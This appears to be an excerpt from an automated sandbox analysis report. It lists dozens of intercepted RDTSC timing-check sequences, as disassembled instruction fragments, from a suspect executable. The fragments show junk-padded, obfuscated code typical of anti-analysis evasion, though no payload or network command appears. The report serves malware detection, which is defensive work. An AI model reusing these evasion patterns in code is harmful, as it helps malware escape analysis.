Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0639 second address: 71D0698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c jmp 00007F953D46EDA6h 0x00000011 mov dword ptr [esi+18h], eax 0x00000014 jmp 00007F953D46EDA0h 0x00000019 mov eax, dword ptr [ebx+58h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F953D46EDA7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0698 second address: 71D06B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 22AAh 0x00000007 mov edx, 23EBBF76h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esi+1Ch], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov dl, cl 0x00000017 mov eax, ebx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D06B2 second address: 71D06B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D06B8 second address: 71D06BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D06BC second address: 71D06FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+5Ch] 0x0000000e jmp 00007F953D46EDA0h 0x00000013 mov dword ptr [esi+20h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F953D46ED9Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D06FC second address: 71D0702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0702 second address: 71D07C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D46ED9Ch 0x00000009 add ax, 9158h 0x0000000e jmp 00007F953D46ED9Bh 0x00000013 popfd 0x00000014 mov dx, ax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+60h] 0x0000001d jmp 00007F953D46EDA2h 0x00000022 mov dword ptr [esi+24h], eax 0x00000025 pushad 0x00000026 mov edi, 2D9D29D0h 0x0000002b popad 0x0000002c mov eax, dword ptr [ebx+64h] 0x0000002f pushad 0x00000030 mov ax, dx 0x00000033 pushfd 0x00000034 jmp 00007F953D46EDA1h 0x00000039 and ah, 00000056h 0x0000003c jmp 00007F953D46EDA1h 0x00000041 popfd 0x00000042 popad 0x00000043 mov dword ptr [esi+28h], eax 0x00000046 pushad 0x00000047 mov di, cx 0x0000004a mov ah, 94h 0x0000004c popad 0x0000004d mov eax, dword ptr [ebx+68h] 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushfd 0x00000054 jmp 00007F953D46ED9Ch 0x00000059 and ecx, 4C2337A8h 0x0000005f jmp 00007F953D46ED9Bh 0x00000064 popfd 0x00000065 call 00007F953D46EDA8h 0x0000006a pop esi 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D07C0 second address: 71D0850 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+2Ch], eax 0x0000000d jmp 00007F953D015246h 0x00000012 mov ax, word ptr [ebx+6Ch] 0x00000016 pushad 0x00000017 movzx ecx, di 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F953D015246h 0x00000021 add ah, FFFFFFC8h 0x00000024 jmp 00007F953D01523Bh 0x00000029 popfd 0x0000002a pop eax 0x0000002b popad 0x0000002c mov word ptr [esi+30h], ax 0x00000030 pushad 0x00000031 mov dx, 49F8h 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 pop esi 0x00000039 popad 0x0000003a mov ax, word ptr [ebx+00000088h] 0x00000041 pushad 0x00000042 movsx edi, ax 0x00000045 jmp 00007F953D015240h 0x0000004a popad 0x0000004b mov word ptr [esi+32h], ax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F953D01523Ah 0x00000058 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0850 second address: 71D0854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0854 second address: 71D085A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D085A second address: 71D0893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+0000008Ch] 0x0000000f pushad 0x00000010 mov esi, 65A2F8CDh 0x00000015 push eax 0x00000016 push edx 0x00000017 call 00007F953D46EDA8h 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0893 second address: 71D08C3 instructions: 0x00000000 rdtsc 0x00000002 mov cl, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+34h], eax 0x0000000a jmp 00007F953D01523Ah 0x0000000f mov eax, dword ptr [ebx+18h] 0x00000012 jmp 00007F953D015240h 0x00000017 mov dword ptr [esi+38h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D08C3 second address: 71D08C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D08C9 second address: 71D094B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015244h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c jmp 00007F953D015240h 0x00000011 mov dword ptr [esi+3Ch], eax 0x00000014 pushad 0x00000015 mov edx, eax 0x00000017 mov edx, eax 0x00000019 popad 0x0000001a mov eax, dword ptr [ebx+20h] 0x0000001d jmp 00007F953D015244h 0x00000022 mov dword ptr [esi+40h], eax 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F953D01523Eh 0x0000002c adc ecx, 27BCB298h 0x00000032 jmp 00007F953D01523Bh 0x00000037 popfd 0x00000038 mov ah, 50h 0x0000003a popad 0x0000003b lea eax, dword ptr [ebx+00000080h] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov edi, eax 0x00000046 movzx ecx, bx 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D094B second address: 71D0960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D46EDA1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0960 second address: 71D09D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F953D015243h 0x00000011 or eax, 76F0E56Eh 0x00000017 jmp 00007F953D015249h 0x0000001c popfd 0x0000001d mov ch, 3Eh 0x0000001f popad 0x00000020 push esi 0x00000021 jmp 00007F953D015248h 0x00000026 mov dword ptr [esp], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F953D015247h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D09D7 second address: 71D0A50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D46ED9Fh 0x00000009 and si, DD8Eh 0x0000000e jmp 00007F953D46EDA9h 0x00000013 popfd 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 lea eax, dword ptr [ebp-10h] 0x0000001c jmp 00007F953D46ED9Ah 0x00000021 nop 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F953D46ED9Dh 0x00000029 add al, 00000076h 0x0000002c jmp 00007F953D46EDA1h 0x00000031 popfd 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F953D46ED9Ch 0x0000003b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0A50 second address: 71D0A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0A56 second address: 71D0A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0AB4 second address: 71D0AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0AB9 second address: 71D0B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushfd 0x00000007 jmp 00007F953D46ED9Dh 0x0000000c add ch, FFFFFFF6h 0x0000000f jmp 00007F953D46EDA1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov edi, eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F953D46EDA8h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0B03 second address: 71D0B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0B07 second address: 71D0B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0B0D second address: 71D0B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F953D01523Ch 0x00000008 pop eax 0x00000009 call 00007F953D01523Bh 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 test edi, edi 0x00000014 pushad 0x00000015 push ebx 0x00000016 mov edi, esi 0x00000018 pop ecx 0x00000019 mov cx, dx 0x0000001c popad 0x0000001d js 00007F95AD323DC2h 0x00000023 jmp 00007F953D01523Fh 0x00000028 mov eax, dword ptr [ebp-0Ch] 0x0000002b pushad 0x0000002c mov edx, ecx 0x0000002e mov ah, 4Ch 0x00000030 popad 0x00000031 mov dword ptr [esi+04h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F953D015245h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0B71 second address: 71D0B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0B86 second address: 71D0B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0B8C second address: 71D0BBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F953D46EDA5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0BBF second address: 71D0C89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D015247h 0x00000009 adc esi, 27E43B6Eh 0x0000000f jmp 00007F953D015249h 0x00000014 popfd 0x00000015 jmp 00007F953D015240h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push 00000001h 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F953D01523Eh 0x00000026 adc al, 00000018h 0x00000029 jmp 00007F953D01523Bh 0x0000002e popfd 0x0000002f call 00007F953D015248h 0x00000034 mov si, 0F51h 0x00000038 pop eax 0x00000039 popad 0x0000003a push ebp 0x0000003b jmp 00007F953D01523Ah 0x00000040 mov dword ptr [esp], eax 0x00000043 jmp 00007F953D015240h 0x00000048 lea eax, dword ptr [ebp-08h] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e mov cl, bh 0x00000050 jmp 00007F953D015246h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0C89 second address: 71D0CAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F953D46EDA4h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov eax, edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0CAE second address: 71D0CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 1CEFDCDCh 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F953D01523Ch 0x00000014 mov ax, 9AD1h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0D23 second address: 71D0D9D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F953D46EDA0h 0x00000008 add ecx, 767B3518h 0x0000000e jmp 00007F953D46ED9Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 test edi, edi 0x00000019 pushad 0x0000001a mov ebx, eax 0x0000001c pushfd 0x0000001d jmp 00007F953D46EDA0h 0x00000022 add si, 1F78h 0x00000027 jmp 00007F953D46ED9Bh 0x0000002c popfd 0x0000002d popad 0x0000002e js 00007F95AD77D6DCh 0x00000034 pushad 0x00000035 mov edx, 4EA5B166h 0x0000003a popad 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F953D46EDA8h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0D9D second address: 71D0DC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c pushad 0x0000000d mov ebx, eax 0x0000000f popad 0x00000010 lea eax, dword ptr [ebx+70h] 0x00000013 jmp 00007F953D01523Ah 0x00000018 push 00000001h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0DC8 second address: 71D0DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0DCC second address: 71D0DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0DD2 second address: 71D0E20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 movzx eax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F953D46EDA4h 0x00000014 adc eax, 17C5A8F8h 0x0000001a jmp 00007F953D46ED9Bh 0x0000001f popfd 0x00000020 mov ebx, esi 0x00000022 popad 0x00000023 mov dword ptr [esp], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F953D46EDA1h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0E20 second address: 71D0E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c pushad 0x0000000d jmp 00007F953D01523Ch 0x00000012 jmp 00007F953D015242h 0x00000017 popad 0x00000018 nop 0x00000019 pushad 0x0000001a mov di, si 0x0000001d mov edx, ecx 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0E67 second address: 71D0E77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0E77 second address: 71D0E8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0F1C second address: 71D0F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0F20 second address: 71D0F3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0F3D second address: 71D0F9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a jmp 00007F953D46EDA4h 0x0000000f mov dword ptr [esi+0Ch], eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 mov si, bx 0x00000017 pop ebx 0x00000018 call 00007F953D46EDA6h 0x0000001d mov ah, DEh 0x0000001f pop ebx 0x00000020 popad 0x00000021 mov edx, 775606ECh 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F953D46EDA4h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0F9B second address: 71D0FAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0FAA second address: 71D0FF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D46ED9Fh 0x00000009 sub ah, FFFFFF8Eh 0x0000000c jmp 00007F953D46EDA9h 0x00000011 popfd 0x00000012 mov dh, al 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F953D46ED9Fh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0FF5 second address: 71D103E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d jmp 00007F953D01523Eh 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F953D015247h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D103E second address: 71D10D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D46EDA2h 0x00000009 sub ecx, 4AEEE628h 0x0000000f jmp 00007F953D46ED9Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test eax, eax 0x0000001a jmp 00007F953D46EDA6h 0x0000001f jne 00007F95AD77D3F1h 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F953D46ED9Eh 0x0000002c add al, FFFFFFB8h 0x0000002f jmp 00007F953D46ED9Bh 0x00000034 popfd 0x00000035 push eax 0x00000036 push edx 0x00000037 pushfd 0x00000038 jmp 00007F953D46EDA6h 0x0000003d jmp 00007F953D46EDA5h 0x00000042 popfd 0x00000043 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D10D5 second address: 71D10F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov edx, dword ptr [ebp+08h] 0x0000000a jmp 00007F953D01523Ah 0x0000000f mov eax, dword ptr [esi] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D10F1 second address: 71D10F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D10F5 second address: 71D1112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1112 second address: 71D1200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b pushad 0x0000000c push esi 0x0000000d mov al, dl 0x0000000f pop ecx 0x00000010 mov bx, 3D38h 0x00000014 popad 0x00000015 mov eax, dword ptr [esi+04h] 0x00000018 jmp 00007F953D46EDA7h 0x0000001d mov dword ptr [edx+04h], eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F953D46EDA4h 0x00000027 add ch, FFFFFFC8h 0x0000002a jmp 00007F953D46ED9Bh 0x0000002f popfd 0x00000030 jmp 00007F953D46EDA8h 0x00000035 popad 0x00000036 mov eax, dword ptr [esi+08h] 0x00000039 pushad 0x0000003a call 00007F953D46ED9Eh 0x0000003f mov dx, ax 0x00000042 pop ecx 0x00000043 push edi 0x00000044 push esi 0x00000045 pop edx 0x00000046 pop eax 0x00000047 popad 0x00000048 mov dword ptr [edx+08h], eax 0x0000004b pushad 0x0000004c jmp 00007F953D46ED9Bh 0x00000051 jmp 00007F953D46EDA8h 0x00000056 popad 0x00000057 mov eax, dword ptr [esi+0Ch] 0x0000005a jmp 00007F953D46EDA0h 0x0000005f mov dword ptr [edx+0Ch], eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F953D46EDA7h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1200 second address: 71D1218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D015244h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1218 second address: 71D121C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D121C second address: 71D1244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F953D015249h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1244 second address: 71D1259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1259 second address: 71D128D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F953D015248h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D128D second address: 71D1291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1291 second address: 71D1297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1297 second address: 71D12B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F953D46ED9Ch 0x00000008 mov dx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esi+14h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D12B4 second address: 71D12BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D12BB second address: 71D12E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D46ED9Eh 0x00000009 and eax, 659F4F58h 0x0000000f jmp 00007F953D46ED9Bh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D12E1 second address: 71D130B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [edx+14h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, BBh 0x0000000f pushfd 0x00000010 jmp 00007F953D01523Ah 0x00000015 and cl, FFFFFFB8h 0x00000018 jmp 00007F953D01523Bh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D130B second address: 71D1311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
